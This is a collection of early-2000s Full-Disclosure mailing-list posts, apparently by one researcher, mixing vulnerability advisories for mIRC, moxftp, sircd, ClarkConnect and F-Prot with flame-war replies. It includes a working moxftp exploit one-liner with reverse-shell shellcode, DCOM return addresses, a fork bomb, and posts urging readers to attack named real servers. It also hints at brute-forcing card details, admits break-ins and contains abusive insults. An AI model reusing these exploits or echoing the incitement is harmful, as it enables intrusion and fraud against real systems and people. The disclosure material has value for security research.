Re: [Full-Disclosure] SRT2003-08-11-0729 - Linux based antivirus software contains several local overflows
KF wrote: >> http://www.secnetops.biz/research snipsnip. ugly freebsd version attached. -- [EMAIL PROTECTED] DSR-virobot.pl Description: Binary data
Re: [Full-Disclosure] dtors sell out ( phrack#62 )
morning_wood wrote: > http://www.phrack.nl/phrack62/p62-0x06.txt > > Well, we are here to fully disclose, that indeed b0f did sell dtors > warez to iDefense. b0f did receive 300 dollars in his paypal account > ([EMAIL PROTECTED]) on March 4th, 2003. Even though this text is simply snipped from somewhere else it deserves a few comments. b0f is not a part of dtors, nor did he ever sell anything belonging to dtors. > anyone want a copy of proof of payment to a dtors member?? A few idefense advisories clearly have my name in it, so I fail to see where you're going with this. Perhaps you see this as '0day' as well. Why don't you spend your time in a better way, for example by searching for some more XSS 'vulnerabilities' or writing some of those .bat files. > or unrealsed exploits ala' Knud Erik Højgaard/kokanin I'd like a copy of those please, for various reasons. > ask and ye shall recieve Howcome the people that have asked you havent yet recieved as you so elegantly put it? > LOLOLOLOL Yes, lololololol 2tm omfg you r0xx0r etc. etc. > morwodthanyouwilleverhave I have a whole shed full, thank you, it's plenty for now. > roots a bitch aint it No, but silly taglines are. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] mIRC "dcc filename spoofing"
Attached document explains all. Rant: People using a product called 'antigen' should be shot, stabbed, and shot again. Today, more than a month after posting DSR-toppler.pl and sircd.sh, I _still_ get 5-8 emails a day saying that 'a virus have been found and quarantined'. Oh please, get a grip. And please oh please stop sending email from invalid addresses, I can't even mail you back and tell you what I think of your AV solution. -- Knud Erik Højgaard I. BACKGROUND mIRC is "a friendly IRC client that is well equipped with options and tools" More information about the application is available at http://www.mirc.com II. DESCRIPTION The DCC GET dialog has a limited area visible for the filename. By DCC sending a file with a specially crafted filename it's possible to 'spoof' a legitimate file. III. ANALYSIS Sending a file which name consists of for example 'me.mpg' + 'about 180 "alt-0160(fakespace)"' + '.exe' leads the recieving user into believing that the file is merely a harmless mpeg file, while it is in fact an executable. mIRC has a handy 'open' button upon completion of the dcc, so unless the user actually opens the download folder and verifies the extension of the file, a compromise is possible. IIIa. MITIGATING FACTORS If the remote user has DCC ignore enabled this will of course not work. IV. DETECTION mirc 6.03 and below has been found vulnerable. V. WORKAROUND unknown VI. VENDOR FIX unknown VII. CVE INFORMATION unknown VIII. DISCLOSURE TIMELINE unknown IX. CREDIT Knud Erik Højgaard/kokanin[a]dtors.net
[Full-Disclosure] gid bin from /usr/ports/korean/elm (FreeBSD)
Sorry, no pretty describing document this time. -- kokanin DSR-korean-elm.pl---txt.poo.av.is.gay Description: Binary data
[Full-Disclosure] Re: gid bin from /usr/ports/korean/elm (FreeBSD)
Knud Erik Højgaard wrote: > Sorry, no pretty describing document this time. Oops, haste makes waste. The shellcode is by eSDee, not zillion. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: [Full-Disclosure] iDEFENSE Security Advisory 07.01.03: Caché Insecure Installation File and Directory Permissions
iDEFENSE Labs wrote: > iDEFENSE Security Advisory 07.01.03: > http://www.idefense.com/advisory/07.01.03.txt > Caché Insecure Installation File and Directory Permissions Someone might want to add "¤#&%¤% coding" to that, see att. -- kokanin DSR-crapche.sh Description: Binary data
Re: [Full-Disclosure] how do they do it???
morning_wood wrote: > Replies like this are realy not need are they??? Yes they are. Besides, please #define like_this. > MrSecurity Reseacher? Wow, you read and nearly typed his title in full. > I suppose i should lament you on your deficencies, Why? AFAIK Thor doesn't report XSS crap or other useless shit. > btw I > dont have the patch installed either... by choice. I wish there were more people like you.. oh wait.. > Dont ass-u-me as we all know what that makes you look like. I believe the construct i know is "dont assume, it makes an ass of u and me" - is this what you're referring to? The way you say it sounds like you want to star in a gay pr0n movie. Ulf Tarmhammar did that earlier, please don't keep it up. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] The incredible intolerance of Knud
Thor Larholm wrote: > We all know that AV vendors are happy to > treat the symptom instead of fixing the problem, so what? We all know that the AV-industry is living on loaned time. Soon (hopefully) people will realise the need for a "safe" (read, no interactivity, just text) mail client. That would be a nice start. Off we go to the new and improved "security features" of win2003. What is it that is so groundbreaking that it is not portable? Oh wait, if it is ported MS would not be able to sell win2003. I sense a pattern. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] listproc local root
someone might have missed this one http://packetstormsecurity.nl/filedesc/DSR-listproc.pl.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] lame mirc bugs
Is this worthwile? I will be taking a poll on the people getting back to me. Someone please email [EMAIL PROTECTED], he's so lonely. -- kokaninATdtorsI. BACKGROUND mIRC is "a friendly IRC client that is well equipped with options and tools" More information about the application is available at http://www.mirc.com II. DESCRIPTION The DCC server which is builtin in mirc listens on port 59 if enabled, and is insecure by design. III. ANALYSIS Connecting to the target om port 59 via for example netcat and typing 100 nick-to-spoof will show a dcc chat request in the targets client, appearing to originate from nick-to-spoof. This can be dangerous if trust relationships are observed between a vulnerable user and a user on a multi-user system, be it a shellprovider/vhost supplier or the likes. IV. DETECTION mIRC 6.03 and below (those versions who incorporate the DCC server) are found to be vulnerable. V. WORKAROUND unknown VI. VENDOR FIX unknown VII. CVE INFORMATION unknown VIII. DISCLOSURE TIMELINE unknown IX. CREDIT / Knud Erik Højgaard/kokaninATdtors.netI. BACKGROUND mIRC is "a friendly IRC client that is well equipped with options and tools" More information about the application is available at http://www.mirc.com II. DESCRIPTION The 'URL handler' allows a user to double-click an url posted in a channel or in a query. This will afterwards be opened in the default browser. The 'URL handler' fails to filter/ignore colour codes in links, making 'url spoofing' possible. III. ANALYSIS Messaging users stuff like "Oh my god Saddam just blew up Israel look for yourself on [EMAIL PROTECTED]/ref.php?refid=spam-user" will lead the target to beleive he's entering cnn.com, while he is in fact accessing www.paysite.com and giving clicks/cash/whatever to the 'attacker'. Note that the 0 is the colour white, which is the default background colour in mIRC. IV. DETECTION mIRC 6.03 and below (those versions who incorporate colour codes/url handling) are found to be vulnerable. V. WORKAROUND unknown VI. VENDOR FIX unknown VII. CVE INFORMATION unknown VIII. DISCLOSURE TIMELINE unknown IX. CREDIT Knud Erik Højgaard/kokaninATdtors.net
Re: [Full-Disclosure] Credit card numbers
Myers, Marvin wrote: > Maybe it is only me, but does anyone else notice a big jump in the > number of merchants that are printing the entire credit card number > and expiration date on receipts? In Denmark they out 4 ciphers, but sadly the position of them alternate(jeez). No expiry date on the receipt, but VISA has limited lifetime, so <50 tries should do it. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Credit card numbers
Nick Jacobsen wrote: > Perhaps it is just my imagination here, and I do realize this is an > unmoderated list, but this seems to be a more than unacceptable email. > This is a professional list - would you go up to someone at a computer > security conference and tell em "oh yeah, I used to card during > highschool all the time"? My favorite phase is the "I don't exploit > this *ANYMORE*" (emphasis added) Bah, I used to shoplift for a living, I don't do it anymore. I believe god forgives sinners as long as they admit it. Occasionally I actually break in to other peoples computers. Boo-fucking-hoo. This list isn't corporate-whores-trying-to-gather-enough-strings-to-get-a-clue. -- kokanin, speaker of truth, friend of jesus, son of God. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: SRT2003-07-16-0358 - bru has buffer overflow and format issues
KF wrote: [snip] >> High Level Description : bru has buffer overflow and format issues [snip] contact [EMAIL PROTECTED] for format-edition, free buffer-linux/freebsd edition attached. -- kokanin ex_bru.c Description: Binary data
Re: [Full-Disclosure] Odd Behavior - Windows Messenger Service
Bojan Zdrnja wrote: > Ok, now take your slackware box, do a default installation on it, > connect it to the network and then do nmap scan on it from a remote > box. hack.dtors.net runs that stuff, [EMAIL PROTECTED]:~$ netstat -an | grep -i list tcp0 0 0.0.0.0:37 0.0.0.0:* LISTEN tcp0 0 0.0.0.0:587 0.0.0.0:* LISTEN tcp0 0 0.0.0.0:79 0.0.0.0:* LISTEN tcp0 0 0.0.0.0:111 0.0.0.0:* LISTEN tcp0 0 0.0.0.0:113 0.0.0.0:* LISTEN tcp0 0 0.0.0.0:21 0.0.0.0:* LISTEN tcp0 0 0.0.0.0:69690.0.0.0:* LISTEN tcp0 0 0.0.0.0:25 0.0.0.0:* LISTEN unix 2 [ ACC ] STREAM LISTENING 75677 /tmp/ssh-qIFD2161/agent.2161 unix 2 [ ACC ] STREAM LISTENING 422/dev/gpmctl [EMAIL PROTECTED]:~$ cat /etc/*ver* news.my_news_server.com Slackware 9.0.0 [EMAIL PROTECTED]:~$ The webserver seems to be gone, but as you casn see the login is toor, the password is left as an exercise to the reader at the moment. Have your way with it, it's a def. install. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Immature blabla / cisco exploit
Joshua Thomas wrote: > AFAIK the list is currently unmoderated. I would like to see it > moderated. This list seems to be more like Jerry Springer than > anything else at the moment. May I recommend bugtraq/unsubscribing/a mail client capable of filtering what you consider unworthy of your gaze/a big cup of something nasty? What makes full-disclosure interesting is the lack of moderation. People wanting corporate bullshit can go read about the latest XSS vulnerability in [EMAIL PROTECTED] and feel like they're in the loop, and at the same time miss out on the fun/avoid people saying rude stuff. -- kokakanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #970 - 38 msgs // x-box hacking at ccc
tcpdumb wrote: > During the 19. Chaos Communication Congress in Berlin/DE they showed > up some X-Box "alterations" ;). > > www.19c3.de (sorry, german language) I believe this was the speech, http://www.ccc.de/congress/2002/fahrplan/event/399.en.html - it was one of the few talks in english, so a few of us went just because we were able to understand what was said. It was a pleasant surprise as it proved to be interesting as well as fairly entertaining. The included url has media as well, jippie. A lot better than what was promised regarding hal2001 - last time i checked 2 crappy realmedia streams and a music video was available. bah. Right now it even seems like the site is down, perhaps for good? who knows. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: Re: [Full-Disclosure] morning_wood should stop posting xss
Myers, Marvin wrote: > Jennifer, >Did you ever think that there is even the slightest possibility > that the wood has done this on purpose? Have you never heard of a > honey-pot. Some people in this world do have the ability to learn by > observing others. So now I guess you are calling all of the honey-pot > and honey-net operators moron's. So did GOBBLES, and it seems some people agree. I for one agree with what "jennifer" said. Thank god we don't all agree, the world would be so _boring_. > This is exactly the BS that gets flame wars started. Lighten up a bit > and look at it from all angles. Maybe a different perspective will > change your outlook on life. After all if it weren't for morons most > of us would be collecting unemployment checks. [repetition of above paragraph. get it?] -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)
Paul Schmehl wrote: > On Sun, 2003-07-27 at 14:24, Jason wrote: >> >> Ok: >> In short it goes like this. >> >> Click Start->Run >> Type "dcomcnfg.exe" >> Turn it off > > Great! Now go click all 5000 computers we have to take care of. Even I, with my limited knowledge, was able to reproduce what seems to have the same effect using "active registry monitor" and a few minutes of spare time. However it seems quite a few things use this DCOM stuff, so rolling out the hotfix via your mass-deployment tool might be the smarter way to go. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] DCOM RPC exploit failed
Marcus Graf wrote: > I compiled dcom.c on linux and tried it against a > Windows 2000 SP4, german version. > > The exploit failed (maybe I need some offset adjustments for the > german version of Win2k) but after that I noticed some malfunctions: Yes, you do. Load up winhex, edit ram, attach to svchost.exe(either one will do), select kernel32.dll(for portability), click ok, click hex search, enter "FFE4", check "archive blah blah", click ok, click ok, click ok, that thing showing will be a proper return address. > - The windows explorer was not able to perform drag'n drop any more. > When I tried to drag a file somewehere nothing happened. > - The media player failed. The window came up and closed itself after > a few seconds. yeah, a pain in the ass indeed. > ... don't know what else failed... outlook express will be unable to open messages, and my mousewheel failed as well. > So even when then exploit failed it may seriously disturb the windows > functionality. A massive scan for vulnerable windows systems on the > net may become the character of an DoS attack even without any > successful exploit. Indeed. What a fine day it will be. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Win-Trap captured DCOM-RPC exploit code, on the spot!
Executable Security wrote: [snip disgusting commercial] Why dont you people fuck off and die die die? Spamming the list is one thing, which should be punished, but spamming my private inbox is worse. It seems www.phsecurity.com runs some old version of openssl, any takers? [EMAIL PROTECTED] spam spam [EMAIL PROTECTED] spam spam, off to usenet we go. -- kokanin, sick of spamming assholes. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] dcom exploit code observations
morning_wood wrote: [snip] > THIS IS NOT THE CASE... > this .bat works perfect... So somehow running the exploit from a .bat file with some shameless selfpromotion makes svchost _not_ crash upon hitting a wrong return address? Would you care to elaborate on how you pull that off? -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] listspammer apology
Hi, there: Sorry that we have spammed you. We did not intend it to be a SPAM even though it was a SPAM to you. We apologize for this in-convenience to you. We will NOT send stuff like that to you and to the list. We must have been crazy. Please do accept our apology. (hope this is not a spam to you.) For PH Security ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] listspammer apology
Knud Erik Højgaard wrote: > Hi, there: > > Sorry that we have spammed you. We did not intend it to be a SPAM even > though it was a SPAM to you. We apologize for this in-convenience to > you. We will NOT send stuff like that to you and to the list. We must > have been crazy. Oops, I suppose i should have made a point clear. This is _not_ an apology from _me_! This is a forward of the personal reply I got for my "FUCK YOU" mails to the sender. Again, I, kokanin, am _not_ "ph security", nor would I ever want to be. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] win2k rpc dcom MAGIC RET'S
Seeing that some fucking idiot couldn't keep his piehole shut, here goes. 0x0018759F 0x001875E3 0x001F0CD0 0x0018759F 0x001875E3 0x001F0CD0 0x010016C6 0x010016CB above tested on win2k sp*, dk sp0, nl sp?. 0x001875E3 0x001F0CD0 0x010016C6 0x010016CB excerpt from above, found to work on above + win2k frog ed. (FREEENCHIIE!! LEEARNEE TEH ENGLIISH!) mad greetings: jumper/pivx, esdee/netric -- kokanin / dtors.net ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] DCOM RPC exploit (dcom.c)
Peter Kruse wrote: > FYI, Incidents.org reports: "Widespread scans for unpatched Windows > machines underway (RPC vulnerability). Patch systems and block ports > 135-139 & 445". > > This might be caused by several tools in the hands of kiddies probing > IP´s for vulnerable systems. This could also be caused by a worm > making it´s first round crashing and exploiting boxes. I guess time > will tell. when it strikes, it won't be silent. > BTW - nothing here, it´s all quite around my firewalls. quiets? wait and see. -- kokasviiijn ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] RE: Miatrade Guestbook - Persistant XSS
[EMAIL PROTECTED] wrote: > - > Windows security hole > - hahahah funny :) god damn you're not the only one sick of his mindless babbling. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] oracle 10g installer race condition
http://kokanins.homepage.dk/or0rcle.txt Unbreakable oracle people not informed, this bug is stupid and next to useless, hence the disclosure. One can only wonder what the coders are thinking when they chmod 777 stuff. -- kokanin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [ElectronicSouls] - SunOS 4.1.x Local Exploit
[EMAIL PROTECTED] wrote: > Please do not distribute. [blah blah snipped] Am I the only one finding this wording ridiculous when it's posted on a mailinglist? -- Angut den stive grønlænder ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Australia becomes a police state [serious]
Silvio Cesare wrote: > Hello.. > > A bill was passed last night in Australia, enabling a "lawful" NSW > police state (http://www.sydney.indymedia.org). > > If i am in a designated "target area", I may be raided > as I type, the person raiding me need not identify themselves. I may > be strip searched, my possesions may be seized and disposed.. > > If i resist, I may be imprisoned for 2 years.. I thought Australia stopped following other peoples opinion when they 'abolished' England as the motherland. What the hell is this? Is there some sort of 'whoever gets most of americas shit on their tongue wins' contes that i dont know of? Is there a cash prize? 'I love America!' -- Knud ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: [Snort-sigs] kadmind exploit rules
anakata wrote: [sinp blah blah] > ^^^ Yes, that DOES apply to YOU. Well boo hoo. Who cares about EULA's? When an EULA says 'you must not reverse engineer or modify this software in any way' you obey it? Information wants to be free. Just like beer. -- Knud ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] R7-0009: Vulnerabilities in SSH2 Implementations from Multiple Vendors
matt merhar wrote:
> On Mon, 16 Dec 2002 10:56:20 -0800 (PST)
> Michal Zalewski <[EMAIL PROTECTED]> wrote:
>
>> :(){ :|:&};:
>
> ^^ don't type that i lost 134 day uptime because of that
No wonder, if you substitute the : with a word, for example bomb, it's
pretty obvious what this does.
bomb(){ bomb|bomb&};bomb
A properly configured login.conf prohibits this from having any effect on my
FreeBSD, and since you dont state your flavour i suppose it's the same as
mine.
--
Knud
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] f-prot antivirus useless buffer overflow
This advisory may be found at http://kokanins.homepage.dk/ This advisory may not be reproduced, in part or in full, unless this notice is included. This advisory was written by knud. I. BACKGROUND According to the vendor "F-Prot TM is a quick and easy to use antivirus software package, specially designed to protect your data from virus infection and to remove any virus that may have infected your computersystem." F-prot is available from www.f-prot.com. II. DESCRIPTION Insufficient bounds checking leads to execution of arbitrary code. Useless exploit at http://kokanins.homepage.dk/f-prot.pl III. ANALYSIS Since f-prot is not suid/sgid the overflowing of the command line pose no initial danger unless the admin interferes, and setting +s on strange binaries must be considered inappropriate at the least. IV. DETECTION F-Prot FreeBSD for Small Business [TM] 3.12b, released on Sep. 30th 2002, the latest available at the time of writing, is known to be vulnerable. V. WORKAROUND below VI. VENDOR FIX [mail received from vendor] Dear Knud, Thank you for your mail. This as bean fixed. best regards, Arnar Thor VII. CVE INFORMATION unknown VIII. DISCLOSURE TIMELINE who cares IX. CREDIT knud ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS
Grégory Le Bras | Security Corporation wrote: > .: Proxomitron Naoko Long Path Buffer Overflow/DoS :. > > > Security Corporation Security Advisory [SCSA-005] > [snip] > Sending a parameter with a buffer of 1024 bytes in length or more, > causes Proxomitron Naoko to crash. > > This vulnerability can be easily exploited to execute code. > > Exploitation example : > > c:\Proxomitron>proxomitron AAA [snip A's] > Could you perhaps provide a real-world example where this might be used to gain additional privileges? I fail to see the useful bit in this vulnerability. -- Knud ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [SCSA-004] Vulnerability in Microsoft Windows XP
Grégory Le Bras | Security Corporation wrote: > .: Vulnerability in Microsoft Windows XP :. .. > Security Corporation Security Advisory [SCSA-004] [snip] > > A vulnerability was found allowing an user of a restricted session to > have access to private files belonging to any user of the machine, > also the administrators. > > > EXPLOIT > > > The exploit is very simple, it is enough to install a httpd Server > such as ©Apache. Put them on the disc where Windows Microsoft is > installed as resources of the server. Connect you to the following > address: http://localhost/ > The index of the disc thus appears to the screen. > You can then cross the directory /documents and Setting/ and so to > reach the private files. How do you define a 'restricted session'? Would a user in a restricted environment set up by you be able to install apache, but not be able to browse the files of other users? Has the apache by any chance been installed as a service running with SYSTEM privileges? -- Knud ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] moxftp arbitrary code execution poc/advisory
Attached document explains all. This document is also available from http://kokanins.homepage.dk -- KnudI. BACKGROUND According to the vendor moxftp is a "Ftp shell under X Window System". /usr/ports/ftp/moxftp II. DESCRIPTION Insufficient bounds checking leads to execution of arbitrary code. III. ANALYSIS Upon parsing the '220 welcome to server' ftp banner a buffer can be overrun, allowing us to execute our arbitrary code. The buffer may be constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing the nops and shellcode in the buffer before ebp seems to cause some problems, luckily there's plenty of space after eip. Example run: $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" . "\n"' > file # nc -l -p 21 < file This sets up a rogue server which will overflow the buffer, and execute the shellcode. The shellcode is connect-back to 217.157.2.36 port 1, replace "\xd9\x9d\x02\x24" with a suitable ip for testing. IV. DETECTION moxftp-2.2 shipping with the FreeBSD ports system as well as from various webpages per 9/2-03 is vulnerable. V. WORKAROUND unknown VI. VENDOR FIX unknown VII. CVE INFORMATION unknown VIII. DISCLOSURE TIMELINE unknown IX. CREDIT Knud Erik Højgaard
[Full-Disclosure] sircd proof-of-concept / advisory
Attached documents explain all. This is also available from http://kokanins.homepage.dk sircd.sh Description: Binary data I. BACKGROUND According to the vendor "The 'sircd' project started as an idea from the QuakeNet IRC Network coding team to develop a completely new irc server that had none of the problems of the original ircd, such as instability, scalability issues, redundant, badly written code and other nasty things. " More info is available at http://www.sircd.org. II. DESCRIPTION a: Insufficient bounds checking leads to execution of arbitrary code. b: Default oper account matching [EMAIL PROTECTED] III. ANALYSIS a: Upon checking the reverse dns of a connecting user, if the returned value is longer than a certain length a classic stack overflow occurs. The buffer may be constructed as such: [94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode], leaving us with plenty of space both before and after eip to store our shellcode. The accompanying .sh script is a silly proof of concept. Below is a fabricated copy of a typical run: [shell 1] $ nc -l -v -p 1 listening on [any] 1 ... [shell 2] # ./sircd.sh 127.0.0.1 sircd 0.4.0 proof-of-concept, usage ./sircd.sh UID check passed, backing up /etc/hosts Now connect to the sircd from 127.0.0.1 Press a key and enter to restore /etc/hosts asd Game over man, game over # [shell 3] $ sircd & [1] 75711 $ = sircd: v0.4.0 Alpha Author(s) Zarjazz ([EMAIL PROTECTED]) = sircd initialized SSL initialized $ BitchX 127.0.0.1 [snip some bitchx output] [fi] *** Welcome to the_server [fi] *** Resolving IP 127.0.0.1 --from here on the connection freezes. [shell 2] fah Game over man, game over # [shell 1] connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869 id uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user) b: type /oper bod bod bod in a connected irc-client. IV. DETECTION sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03. V. WORKAROUND The fix has been incorporated in the CVS tree as per 04/02-03. VI. VENDOR FIX Same as above. VII. CVE INFORMATION unknown VIII. DISCLOSURE TIMELINE 03/02-02 [EMAIL PROTECTED],[EMAIL PROTECTED] notified. 04/02-02 [EMAIL PROTECTED] responded with a fix. 04/02-02 public disclosure. IX. CREDIT Knud Erik Højgaard
[Full-Disclosure] clarkconnect(d) information disclosure
Attached document explains all.
This is also available from http://kokanins.homepage.dkI. BACKGROUND
According to the vendor "ClarkConnect transforms standard PC hardware
into a dedicated broadband gateway and easy-to-use server. The
award-winning Linux-based server solution includes firewall and security
tools, along with file, print, web, e-mail, proxy, and VPN servers."
ClarkConnect is available from http://www.clarkconnect.org/
II. DESCRIPTION
A service named clarkconnectd can be 'persuaded' into giving up various
information about the system.
III. ANALYSIS
clarkconnectd listens on tcp port 10005. By feeding it certain characters
followed by several line feeds the system will deliver various info.
Characters found to produce output are:
"A" - date and time on server
"F" - some unknown number
"M" - various ifconfig output [1]
"P" - process listing [2]
"Y" - snort log file [3]
"b" - /var/log/messages
IV. DETECTION
The service is known to ship with ClarkConnect linux 1.2.
$ md5sum /usr/sbin/clarkconnectd
2188b6afe10bb213e9dcf93b5c43ef1d /usr/sbin/clarkconnectd
V. WORKAROUND
rm /usr/sbin/clarkconnectd
VI. VENDOR FIX
unknown
VII. CVE INFORMATION
unknown
VIII. DISCLOSURE TIMELINE
23/2-03 [EMAIL PROTECTED] notified
23/2-03 autoresponse received, [ticket #3822]
24/3-03 response:
begin response
This is an old and deprecated daemon that is used for backwards
compatibility. We'll have a fix to limit the amount of information that is
sent out. Believe it or not, it is supposed to give this information out on
the LAN/trusted network.
You are right though... it is too much information.
_
Peter Baldwin
Point Clark Networks
end response
IX. CREDIT
Knud Erik Højgaard
[1]
eth0 00:50:56:40:89:1F 10.0.0.124 255.255.255.0 none 00:00:00:00:00:00 0.0.0.0 0.0.0.0
10.0.0.1-eth0 212.242.40.3 0.0.0.0 -- -- -- --:--:-- -- -- -- --:--:--
[2]
root 1 0.0 0.0 1308 76 ? S Jan28 0:34 init
root 2 0.0 0.0 0 0 ? SW Jan28 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Jan28 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN Jan28 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW Jan28 0:44 [kswapd]
root 6 0.0 0.0 0 0 ? SW Jan28 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW Jan28 0:02 [kupdated]
root 8 0.0 0.0 0 0 ? SW Jan28 0:00 [mdrecoveryd]
root 16 0.0 0.0 0 0 ? SW Jan28 0:34 [kjournald]
root 135 0.0 0.0 0 0 ? SW Jan28 0:00 [kjournald]
root 481 0.0 0.0 1364 164 ? S Jan28 0:33 syslogd -m 0
root 486 0.0 0.0 1912 168 ? S Jan28 0:21 klogd -c 1 -2
root 560 0.0 0.1 2568 312 ? S Jan28 0:04 /usr/sbin/sshd
root 609 0.0 0.0 1472 120 ? S Jan28 0:20 crond
root 639 0.0 0.0 4816 4 ? S Jan28 0:00 smbd -D
root 644 0.0 0.2 3784 384 ? S Jan28 0:42 nmbd -D
root 706 1.7 10.8 51748 20760 ? S Jan28 21:22 snort -D
root 766 0.0 0.0 5248 60 ? S Jan28 0:25 webconfig -f /var/webconfig/conf/httpd.conf
root 771 0.0 0.0 1280 4 tty2 S Jan28 0:00 /sbin/mingetty tty2
root 772 0.0 0.0 1280 4 tty3 S Jan28 0:00 /sbin/mingetty tty3
root 773 0.0 0.0 1280 4 tty4 S Jan28 0:00 /sbin/mingetty tty4
root 774 0.0 0.0 1280 4 tty5 S Jan28 0:00 /sbin/mingetty tty5
root 775 0.0 0.0 1280 4 tty6 S Jan28 0:00 /sbin/mingetty tty6
root 2972 0.0 0.0 2224 4 ? S Jan28 0:00 login -- root
root 12050 0.0 0.3 2392 700 tty1 S Jan28 0:02 -bash
502 5338 0.0 0.1 5392 380 ? S Jan28 0:16 webconfig -f /var/webconfig/conf/httpd.conf
502 5403 0.0 0.1 5288 244 ? S Jan28 0:01 webconfig -f /var/webconfig/conf/httpd.conf
suva 5567 0.0 0.4 2416 932 ? S Jan28 0:00 /usr/local/suva/bin/suvad
root 7667 0.0 2.0 5388 3984 ? S Jan28 0:12 netwatchd
root 9897 0.0 0.2 1468 420 ? S 00:07 0:07 clarkconnectd
root 31066 0.5 0.8 3516 1712 ? S 13:06 0:01 /usr/sbin/sshd
kain 31067 0.1 0.6 2380 1280 pts/0 S 13:06 0:00 -bash
root 31127 0.0 0.5 2264 1008 pts/0 S 13:06 0:00 su -
root 31128 0.2 0.6 2396 1304 pts/0 S 13:06 0:00 -bash
root 31250 0.1 0.2 1484 448 ? S 13:09 0:00 clarkconnectd
root 31251 1.0 0.4 2056 844 pts/0 S 13:09 0:00 telnet localhost 10005
root 31252 0.0 0.2 1484 428 ? S 13:09 0:00 clarkconnectd
root 31257 0.0 0.5 2168 968 ? S 13:09 0:00 sh -c /bin/ps auxw | sed "s/[ ][ ]*/ /g"
root 31258 0.0 0.3 2532 680 ? R 13:09 0:00 /bin/ps auxw
root 31259 0.0 0.1 1336 372 ? S 13:09 0:00 sed s/[ ][ ]*/ /g
[3]
Jan-28-2000 01:35:40 last message repeated 2 times
Jan-28-2000 01:37:40 last message repeated 2 times
Jan-28-2000 01:38:40 snort [1:469:1] ICMP PING NMAP [Classification: Attempted
Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:40:04 sshd Accepted password for kain from 217.157.2.38 port 4624 ssh2
Jan-28-2000 01:40:14 snort [1:469:1] ICMP PING NMAP [Classification: Attempted
Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:41:14 snort [1:469:1] ICMP PING NMAP [Classification: Attempted
Information Leak] [Priority: 2]: {ICMP} 10.0.0.124 -> 10.0.0.1
Jan-28-2000 01:43:14 last message repeated 2 times
